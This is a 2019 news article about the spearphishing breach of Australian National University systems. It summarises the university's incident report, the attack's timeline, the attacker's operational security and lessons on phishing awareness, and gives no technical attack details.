Published on the 10/10/2019 | Written by Heather Wright
Interaction not required in ANU spearphishing attack…
A ‘sophisticated spearphishing email’ which didn’t require any user interaction gave an unidentified attacker access to Australian National University (ANU) systems, but a detailed investigation into the attack has failed to identify which records were stolen, who was behind the breach or the possible reasons for it.
In what it says is an effort to be as transparent as possible, the ANU has released a 20-page report into the attack, which breached the University’s Enterprise Systems Domain administrative systems housing HR, financial management, student administration and enterprise e-form systems.
While the attacker gained access to the system in early November 2018 and was active in the network for around six weeks, the intrusion wasn’t detected until April 2019, when a threat hunting exercise uncovered suspicious network traffic data.
An incident response team uncovered the data breach on 17 May.
Brian Schmidt, Australian National University vice-chancellor and president, says the perpetrators of the breach were ‘extremely sophisticated’, shocking ‘even the most experienced Australian security experts’.
Following the ANU’s announcement of the attack in June, fingers were pointed at China. However, the report says it was unable to identify who was behind the latest attack – believed to have been a different attacker to that behind the May 2018 attack.
The report, which deliberately glosses over some details to ensure it isn’t ‘an instruction manual for would-be hackers’, outlines how a spearphishing email was used to gain access. The email, however, didn’t require user interaction such as clicking on a link or downloading an attachment. Despite only being previewed by the senior staff member who received it, the interaction-less attack resulted in the staff member’s credentials being sent to several external web addresses.
Despite only being previewed, the interaction-less attack email garnered credentials.
“It is highly likely that the credentials taken from this account were used to gain access to other systems,” the report says. Access was also gained to the staff member’s calendar, with information from that used to conduct additional spearphishing attacks.
From there the attacker gained access into the internet facing webserver, using the stolen credentials, before compromising a legacy server hosting trial software. Attached to a virtual LAN which had extensive access across the ANU network.
“In addition to their efficiency and precision, the actor evaded detection systems, evolved their techniques during the campaign, used custom malware and demonstrated an exceptional degree of operational security that left few traces of their activities,” ANU says.
“The actor exhibited exceptional operational security during the campaign and left very little in the way of forensic evidence. Logs, disk and file wipes were a recurrent feature of the campaign.
The attack included several phishing campaigns, and the report notes the need for greater phishing awareness as one of the key lessons learned – along with the need for protection of affected members and dealing with any repercussions due to the loss of personally identifiable information.
“Given the methods of the actor and the number of successfully phished users, it is clear to us that more effort is required to help drive awareness and safe user behaviours,” ANU says, noting that it has begun phishing awareness campaigns and invested in stronger mail gateway safeguards.
Todd Peterson, IAM evangelist at One Identity, is a little more scathing.
“In 2018, it took just 16 minutes for the first click to occur on a phishing email,” he says. “As such it is worrying that in 2019, that timeframe has not lengthened at all.
“Whilst advanced privileged access management systems and two factor authentication may be used correctly by organisations, newly developed infected emails can still pass the defence line and enter a network. With this in mind, it is important that identity and access management systems and processes are current, with the fast moving nature of these hacks, it is vital organisations keep up.”
Peterson says that’s particularly true for higher education institutions which are at higher risk due as a result of maintaining old computers and systems that house significant amounts of valuable personal data which can be sold on the black market.
ANU says it’s continuing to scan online sources for evidence any of the stolen data is being traded or used illegally. As yet there’s been no evidence of any activity.
The University, which acknowledges in the report that several technical vulnerabilities and people and process issues contributed to the success of the attack, has since bolstered its cyber security.